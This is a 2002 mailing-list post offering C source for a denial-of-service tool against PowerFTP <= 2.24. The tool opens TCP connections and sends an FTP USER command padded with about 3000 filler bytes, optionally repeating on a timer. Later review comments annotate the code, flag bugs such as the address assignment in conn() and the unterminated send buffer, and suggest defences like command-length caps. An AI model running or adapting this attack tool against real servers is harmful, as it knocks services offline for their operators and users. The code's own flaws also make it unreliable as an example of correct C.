Coolsoft PowerFTP <= v2.24 Denial of Service (Linux Source)

From: a b (p0pt4rtzat_private)
Date: Sat Oct 12 2002 - 00:20:55 PDT


    Coded for fun.. I had nothing else to code and had nothing else to do. :P
    I coded it cause Armand released C source that wuz for Windows.
    
    Enjoy,
    --p0pt4rtz
    
    /*uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!
    *                                                    uNF!
    * PowerFTP Denial of Service (Linux Source)          uNF!
    * by p0pt4rtz of Trippin Smurfs                      uNF!
    * --                                                 uNF!
    * Coded for fun :p                                   uNF!
    *                                                    uNF!
    *uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!uNF!
    */
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netinet/in_systm.h>
    #include <netinet/ip.h>
    #include <netinet/tcp.h>
    #include <arpa/inet.h>
    #include <unistd.h>
    #include <strings.h>
    #include <errno.h>
    
    /* FTP verb written at the start of the buffer that sdos() sends. */
    #define VAR   "USER "
    /* Terminal colour escape sequences; used only in the banner printed by main(). */
    #define TITLE "\E[37m"
    #define p0p   "\E[33;1m"
    #define SMURF "\E[36m"
    #define NORM  "\E[m"
    
    /* No visible function reads this global; resolve() declares its own local `he`. */
    struct hostent *he;
    /* Destination address; filled in by conn() before connect(). */
    struct sockaddr_in sck;
    
    /*
     * Forward declarations. The empty parameter lists on conn(), sdos(), kconn()
     * and oconn() leave the parameters unspecified; they are not (void) prototypes.
     */
    void usage(char *progname);
    int conn();
    int sdos();
    size_t resolve(char *name);
    void interm(size_t freedom);
    void kconn();
    void oconn();
    
    /* Program-wide state, written by main() and conn() and read by the helpers. */
    int verbose;              /* incremented once per -v in main() */
    int sock;                 /* socket created in conn(), closed in kconn()/oconn() */
    size_t port, sleepy=0;    /* -p and -s values; main() converts both with atoi() */
    char *host=NULL;          /* -d value, or "127.0.0.1" when main() sees none */
    
    /*
     * Print the option summary to stderr.
     *
     * progname: text substituted for %s in the usage line; main() passes argv[0].
     */
    void
    usage(char *progname)
    {
    fprintf(stderr, "\xac usage: %s <options> -d <host>\n\n"
                    
    "-----------.----------------------------------------------\n"
                    "-d <host>  | remote host to connect to. (default: 
    127.0.0.1)\n"
                    "-p <#port> | remote port to connect to. (default: 21)\n"
                    "-s <#secs> | reattack after n seconds.\n"
                    "-v         | verbosity. twice for greater effect.\n"
                    "-h         | this help for this lame ass program.\n"
                    "           '\n\n", progname);
    }
    
    
    /*
     * Create a TCP socket in the global `sock` and connect it using the global
     * `sck`, which is filled in here from `port` and the local `ip`.
     *
     * Returns 0 when connect() succeeds. Returns -1 after a perror() message
     * when the resolve test, socket() or connect() fails; the socket is not
     * closed on the connect() failure path.
     */
    int
    conn()
    {
      int ip;
    
      /*
       * NOTE(review): as parenthesised, `ip` receives the value of the
       * comparison `resolve(host) == 0`, not the value resolve() returned.
       */
      if (ip=(resolve(host) == 0)) {
        perror("resolve");
        return -1;
      }
    
      if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket");
        return -1;
      }
    
    
      sck.sin_family = AF_INET;
      sck.sin_port = htons(port);   /* port is a size_t; htons() takes 16 bits */
      sck.sin_addr.s_addr = ip;
      memset(&(sck.sin_zero), '\0', 8);
    
      if (connect(sock, (struct sockaddr *)&sck, sizeof(struct sockaddr)) == -1) 
    {
        perror("connect");
        return -1;
      }
    
    
    return 0; /* all three steps succeeded */
    }
    
    /*
     * Build and send the request this advisory is about: the FTP "USER " verb
     * followed by a run of 'i' filler bytes, written to the global `sock` with
     * one send() call. The page title names PowerFTP <= v2.24 as the affected
     * server and does not say why the server fails on this input.
     *
     * For defenders the relevant property is the size of the USER argument,
     * which is thousands of bytes and far longer than any real account name.
     * A server-side cap on control-channel command length, or a monitoring rule
     * on USER argument length, addresses this class of request.
     *
     * Returns 0 after a successful send(), -1 after perror() when send() fails.
     */
    int
    sdos()
    {
      int z;
      char sugawh[3006];
    
      sprintf(sugawh, VAR);
    
      /*
       * The fill starts at index 5, which overwrites the terminator sprintf()
       * wrote, and stops at index 2999. Bytes 3000..3005 are never initialised,
       * so the strlen() below has no guaranteed terminator to find.
       */
      for(z=5;z<3000;z++)
        sugawh[z]='i';
    
      if ((send(sock, sugawh, strlen(sugawh), 0)) == -1) {
        perror("send");
        return -1;
    
      }
    
    return 0; /* send() reported success */
    }
    
    /*
     * Turn a dotted-quad string or a host name into an IPv4 address in network
     * byte order.
     *
     * name: text handed first to inet_addr() and, if that fails, to
     *       gethostbyname().
     *
     * Returns the address, or 0 when the name lookup fails. The string
     * "255.255.255.255" equals inet_addr()'s error value, so it also takes the
     * lookup path. Four bytes are copied from the first address of the lookup
     * result without consulting h_length.
     */
    size_t
    resolve(char *name)
    {
        struct hostent *entry;
        unsigned int addr = inet_addr(name);

        /* A parsed dotted quad needs no lookup. */
        if (addr != (unsigned int)-1)
            return addr;

        entry = gethostbyname(name);
        if (entry == 0)
            return 0;

        memcpy(&addr, entry->h_addr_list[0], 4);
        return addr;
    }
    
    
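    /*
     * Wait `freedom` seconds, one second at a time, between rounds of kconn().
     *
     * freedom: number of seconds to wait; 0 returns after the status output.
     *
     * Status text goes to stderr and depends on the global `verbose`: any
     * non-zero value prints the start and end messages, 2 or more also prints
     * a per-second counter. stderr is flushed at every step whatever the
     * verbosity.
     *
     * The counter is a size_t printed with %zu. The earlier form used an int
     * counter and %d for size_t values, which mismatches the argument type and
     * overflows the counter for large intervals.
     */
    void
    interm(size_t freedom)
    {
      size_t elapsed;

      if (verbose != 0)
        fprintf(stderr, "Sleeping. Standby...\r");
      fflush(stderr);

      for (elapsed = 0; elapsed < freedom; elapsed++) {
        sleep(1);
        /* Report the number of whole seconds slept so far. */
        if (verbose >= 2)
          fprintf(stderr, "Sleep progress : %zu Seconds out of %zu \r",
                  elapsed + 1, freedom);
        fflush(stderr);
      }

      if (verbose != 0)
        fprintf(stderr, "Done!                             \r");
      fflush(stderr);
    }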
    
    /*
     * Repeating mode, chosen by main() when -s gave a non-zero interval:
     * conn(), sdos(), close the socket, wait `sleepy` seconds in interm(), and
     * start over. The loop has no exit condition; the process ends with status
     * 1 only when conn() or sdos() returns -1.
     *
     * Seen from the server this is a new TCP connection every `sleepy` seconds
     * from the same source, each carrying one request, so a per-source
     * connection-rate limit applies as well as a command-length cap.
     */
    void
    kconn()
    {
      int a=0,b=0;   /* neither variable is used below */
    
      while(!0)
      {
        /* Each status line starts with one non-ASCII byte and a tab, and ends in \r. */
        fprintf(stderr, "\xb9\tConnecting..                                      
         \r");
        fflush(stderr);
        if ((conn())==-1)
          exit(1);
    
        fprintf(stderr, "\xb2\tSending sugawh to dis bish..                      
         \r");
        fflush(stderr);
        if ((sdos())==-1)
          exit(1);
    
        close(sock); /* one connection per round; conn() opens a new socket next time */
        fflush(stderr);
        fprintf(stderr, "\xb3\tDone!                                             
         \r");
        fflush(stderr);
    
        interm(sleepy);
    
      }
    }
    
    /*
     * Single-shot mode, chosen by main() when no interval was given: one
     * conn(), one sdos(), then close the socket. Progress goes to stderr and
     * two newlines go to stdout at the end. The process exits with status 1
     * when conn() or sdos() returns -1.
     */
    void
    oconn()
    {
      /* Each status line starts with one non-ASCII byte and a tab, and ends in \r. */
      fprintf(stderr, "\xb9\tConnecting..                                        
       \r");
      fflush(stderr);
      if ((conn())==-1)
        exit(1);
    
      fprintf(stderr, "\xb2\tSending sugawh to dis bish..                        
       \r");
      fflush(stderr);
      if ((sdos())==-1)
        exit(1);
    
      close(sock); /* the connection is closed without reading any server reply */
    
      fflush(stderr);
      fprintf(stderr, "\xb3\tDone!                                               
       \r");
      fflush(stderr);
    
      printf("\n\n");
    }
    
    /*
     * Entry point: print the banner, parse -d/-p/-s/-v/-h, report the chosen
     * settings on stderr, then call kconn() when -s gave a non-zero interval
     * and oconn() otherwise. No return statement follows the final call.
     */
    int
    main(int argc, char *argv[])
    {
      /* getopt() returns int; the result is stored in a char before the EOF test. */
      char c;
    
      fprintf(stderr, "\n" TITLE "PowerFTP <= 2.24 Denial of Service (Linux 
    Source)" NORM "\n"
                      "by " p0p "p0pt4rtz" NORM " of " SMURF "Trippin Smurfs" 
    NORM "\n"
                      "coded for fun :p\n\n");
    
      if (argc<2) {
        usage(argv[0]);
        exit(1);
      }
    
    
      while ((c=getopt(argc, argv, "d:p:s:vh")) != EOF)
      {
        switch(c)
        {
          case 'd': {
            /* Length cap on the host argument; the argv pointer is kept, not copied. */
            if (strlen(optarg) > 2000) {
              fprintf(stdout, "too long of a hostname: %s\n", optarg);
              exit(1);
            }
            host = optarg;
    
            break;
          }
    
          case 'p': {
            /* atoi() reports no parse errors; the range test is the only validation. */
            port = (optarg==NULL) ? 80 : atoi(optarg);
            if ( port<=0 || port > 65535 ) {
              fprintf(stderr, "invalid portno assignment.\n");
              exit(1);
            }
          break;
          }
    
          case 's': {
            /* No range or error check is applied to the interval. */
            sleepy = atoi(optarg);
            break;
          }
    
          case 'v': {
            verbose += 1;
            break;
          }
    
          case 'h': {
            usage(argv[0]);
            exit(1);
            break;
          }
        }
      }
    
      if (host==NULL) {
        fprintf(stderr, "no host specified, using default 127.0.0.1\n\n");
        host="127.0.0.1";
      }
    
      /* port and sleepy are size_t but are printed with %d here and below. */
      fprintf(stderr,
         "attack information:\n"
         "'''''''''''''''''''\n"
         "remote host: %s\n"
         "remote port: %d\n", host, port);
      if (sleepy!=0)
        fprintf(stderr, "attack interm: %d seconds\n", sleepy);
      fprintf(stderr, "-----------------------------\n");
    
      /* A non-zero interval selects the repeating loop, otherwise a single pass. */
      if (sleepy!=0)
        kconn();
        else
          oconn();
    
    }
    
    
    
    
    


